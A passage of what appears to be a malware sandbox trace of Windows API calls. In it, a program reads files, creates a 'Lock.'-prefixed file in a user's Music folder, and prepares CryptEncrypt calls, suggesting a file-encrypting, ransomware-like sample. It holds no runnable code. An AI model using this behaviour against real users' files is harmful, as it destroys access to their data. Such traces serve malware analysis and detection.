hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0246.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0246.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0246.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0246.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0246.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0246.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0246.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0246.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0246.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0246.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x978490 [0246.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0246.830] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music/" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0246.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0246.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0246.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0246.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0246.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0246.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0246.831] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music/Lock.RDmw5DGaT83 YD.mp3" (normalized: "c:\\users\\fd1hvy\\music\\lock.rdmw5dgat83 yd.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0246.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0246.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0246.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0246.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0246.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0246.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0246.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0246.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0246.832] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0246.833] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0246.833] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0246.833] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0246.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0246.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0246.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0246.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0246.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0246.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0246.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0246.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0246.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe54020 [0246.836] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0246.836] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0246.840] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x565c, lpOverlapped=0x0) returned 1 [0246.841] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0246.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0246.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.841] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0246.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0246.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1565c) returned 0x2f14010 [0246.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe54020 | out: hHeap=0x970000) returned 1 [0246.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0246.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0246.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0246.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0246.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0246.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0246.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0246.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0246.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1565c) returned 0x2f29678 [0246.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0246.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0246.851] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0246.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0246.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0246.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0246.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0246.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1565c) returned 0x2f14010 [0246.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0246.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0246.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0246.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0246.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0246.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0246.852] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0246.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0246.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0246.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0246.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0246.852] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0246.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b90 [0246.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0246.852] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0246.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b90 | out: hHeap=0x970000) returned 1 [0246.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0246.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0246.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1565c) returned 0x2f14010 [0246.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0246.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0246.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0246.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0246.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1565c) returned 0x2e7f320 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0246.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0246.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0246.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0246.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0246.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0246.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0246.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0246.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0246.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0246.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0246.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0246.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0246.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0246.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0246.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0246.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0246.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0246.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0246.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0246.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0246.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0246.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0246.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0246.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0246.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0246.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0246.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0246.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0246.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0246.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0246.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0246.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0246.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0246.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0246.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0246.860] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.861] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.861] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.861] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0246.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0246.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0246.861] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.861] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0246.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0246.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0246.861] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0246.861] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0246.861] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.861] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0246.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0246.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0246.862] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0246.862] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0246.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0246.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0246.862] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0246.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0246.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0246.862] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0246.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0246.903] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0246.906] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0246.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0246.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51478, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0246.907] HeapFree 